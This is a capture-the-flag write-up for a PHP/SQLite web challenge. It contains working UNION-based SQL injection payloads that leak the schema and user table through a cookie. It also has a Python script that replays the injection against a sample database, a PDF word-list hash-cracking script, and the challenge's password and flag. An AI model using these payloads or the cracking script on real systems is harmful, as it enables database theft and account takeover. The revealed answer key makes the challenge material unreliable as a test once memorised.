Challenge:
Solution:
The page is nothing but a jumble of redirects and I had no idea where to start; I solved it after reading a writeup.
Directory scan
The scan turns up login.php. Viewing its source reveals a debug parameter; requesting ?debug=1 returns the following code:
<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
    $user = $_POST['usr'];
    $pass = $_POST['pw'];
    $db = new SQLite3('../fancy.db');
    $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }
    if(isset($row['id'])){
        setcookie('name',' '.$row['name'], time() + 60, '/');
        header("Location: /");
        die();
    }
}
if(isset($_GET['debug'])) highlight_file('login.php');
?>
The query string is trivially closed with a single quote, but nothing here returns a flag directly. The useful side channel is the cookie: whatever lands in the second column of the first row is written into Set-Cookie. So capture the request in Burp, inject through usr, and watch the response headers:
usr=' union select name,sql from sqlite_master--+&pw=
Why select sql? SQLite keeps its schema in the built-in table sqlite_master, whose sql column holds the CREATE statement of every table and index, which is why it is the first thing to read during an injection. The original WHERE clause matches nothing, so the first row fetchArray() returns is the UNION row, and its second column (the CREATE statement) comes back in the response's Set-Cookie header. Decoded, the Set-Cookie value is:
CREATE TABLE Users( id int primary key, name varchar(255), password varchar(255), hint varchar(255) )
That gives the table name and all of its columns. Still through usr, use LIMIT offset,1 to step through the rows one at a time and read each column (%27 is the URL-encoded single quote; raise the offset to limit 1,1 and limit 2,1 for the next rows):
usr=%27 UNION SELECT id, id from Users limit 0,1--+&pw=chybeta
usr=%27 UNION SELECT id, name from Users limit 0,1--+&pw=chybeta
usr=%27 UNION SELECT id, password from Users limit 0,1--+&pw=chybeta
usr=%27 UNION SELECT id, hint from Users limit 0,1--+&pw=chybeta
Data obtained (values as they appear in Set-Cookie, so spaces are URL-encoded as + and the leading + is the space login.php prepends; fritze's hint contains a byte that did not decode):
name    password (sha1(pw."Salz!"))                hint
admin   3fab54a50e770d830c0416df817567662a9dc85c   +my+fav+word+in+my+fav+paper?!
fritze  54eae8935c90f467427f05e4ece82cf569f89507   +my+love+is�
hansi   34b0bb7c304949f9ff2fc101eef0f048be10d3bd   +the+password+is+password
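As an added example, not part of the writeup, the whole enumeration above reproduced offline against an in-memory SQLite copy of the Users table: the query is built by string concatenation exactly as login.php does it, the sqlite_master payload leaks the CREATE statement, and the LIMIT offset,1 payloads walk the rows column by column, returning the value that would have landed in Set-Cookie. The user rows are constructed sample data (only the admin password, ThinJerboa, comes from the writeup; the other two passwords are made up), and a parameterized safe_login is included to show why the same payload does nothing against bound parameters.

```python
import hashlib
import sqlite3

SALT = "Salz!"  # the salt login.php appends before hashing


def salted_sha1(password):
    """sha1(password . 'Salz!') exactly as login.php stores it."""
    return hashlib.sha1((password + SALT).encode("utf-8")).hexdigest()


def build_db():
    """In-memory stand-in for fancy.db using the schema leaked via sqlite_master.
    Constructed sample rows; only admin's password is from the writeup."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users( id int primary key, name varchar(255), "
               "password varchar(255), hint varchar(255) )")
    users = [
        (1, "admin", "ThinJerboa", "my fav word in my fav paper?!"),
        (2, "fritze", "made-up-pw", "my love is"),            # constructed
        (3, "hansi", "password", "the password is password"),  # constructed
    ]
    for uid, name, pw, hint in users:
        db.execute("INSERT INTO Users VALUES (?,?,?,?)",
                   (uid, name, salted_sha1(pw), hint))
    return db


def vulnerable_login(db, usr, pw):
    """Mirrors login.php: usr is concatenated straight into the SQL text.
    Returns the first row, i.e. what fetchArray() would hand to setcookie()."""
    sql = ("SELECT id,name from Users where name='" + usr
           + "' and password='" + salted_sha1(pw) + "'")
    return db.execute(sql).fetchone()


def safe_login(db, usr, pw):
    """Hardened form: bound parameters, so a quote in usr is just data."""
    return db.execute("SELECT id,name FROM Users WHERE name=? AND password=?",
                      (usr, salted_sha1(pw))).fetchone()


def leak_schema(db):
    """The sqlite_master payload; '--+' arrives as '-- ' after URL decoding.
    The original WHERE matches nothing, so the UNION row comes first."""
    row = vulnerable_login(db, "' union select name,sql from sqlite_master-- ", "")
    return row[1]  # the sql column: the CREATE TABLE statement


def dump_users(db):
    """Walk the table with LIMIT offset,1, one UNION query per column.
    Returns {name: (password_hash, hint)}; stops when an offset yields no row."""
    users = {}
    offset = 0
    while True:
        cols = []
        for col in ("name", "password", "hint"):
            payload = "' UNION SELECT id, %s from Users limit %d,1-- " % (col, offset)
            row = vulnerable_login(db, payload, "")
            cols.append(row[1] if row else None)
        if cols[0] is None:
            break
        users[cols[0]] = (cols[1], cols[2])
        offset += 1
    return users


if __name__ == "__main__":
    db = build_db()
    print(leak_schema(db))
    for name, (pw_hash, hint) in dump_users(db).items():
        print(name, pw_hash, hint)
```

Each UNION pairs id with the column being read, so the rows come back in the same order for every column and can be zipped together by offset; the second column of the tuple is the one login.php copies into the cookie.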
As the query in the source shows, the password column holds sha1(password . "Salz!"), so to log in we need a plaintext whose salted SHA-1 equals admin's hash. admin's hint is "my fav word in my fav paper?!", which suggests the password is a word taken from one of the PDF papers on the site.
wget ip -r -np -nd -A .pdf
That pulls every PDF on the site (-r recursive, -np do not climb to the parent directory, -nd flat output directory, -A .pdf accept only PDFs), 30 in total. Then parse them with a script that hashes every word together with the salt and compares the result against admin's stored hash. The script below is borrowed from another player's writeup:
# -*- coding:utf-8 -*-
# Ported here to Python 3 and pdfminer.six (pip install pdfminer.six); the
# original was a Python 2 script using cStringIO, reload(sys) and the
# low-level pdfminer converters, with the same logic.
import hashlib
import os

from pdfminer.high_level import extract_text

SALT = "Salz!"
# admin's stored hash, from the dumped password column
TARGET = "3fab54a50e770d830c0416df817567662a9dc85c"


def get_pdf():
    """All PDFs that wget dropped into the current directory."""
    return [i for i in os.listdir("./") if i.endswith("pdf")]


def convert_pdf_2_text(path):
    """Extract the text of every page of one PDF."""
    with open(path, "rb") as fp:
        return extract_text(fp)


def find_password():
    """Hash every word of every PDF with the salt and compare to admin's hash.
    split() with no argument splits on any whitespace, not only spaces."""
    for i in get_pdf():
        print("Searching word in " + i)
        for word in convert_pdf_2_text(i).split():
            sha1_password = hashlib.sha1((word + SALT).encode("utf-8")).hexdigest()
            if sha1_password == TARGET:
                print("Find the password :" + word)
                return word
    return None


if __name__ == "__main__":
    find_password()
The password is ThinJerboa. Log in as admin, open admin.php, and the flag is there:
flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}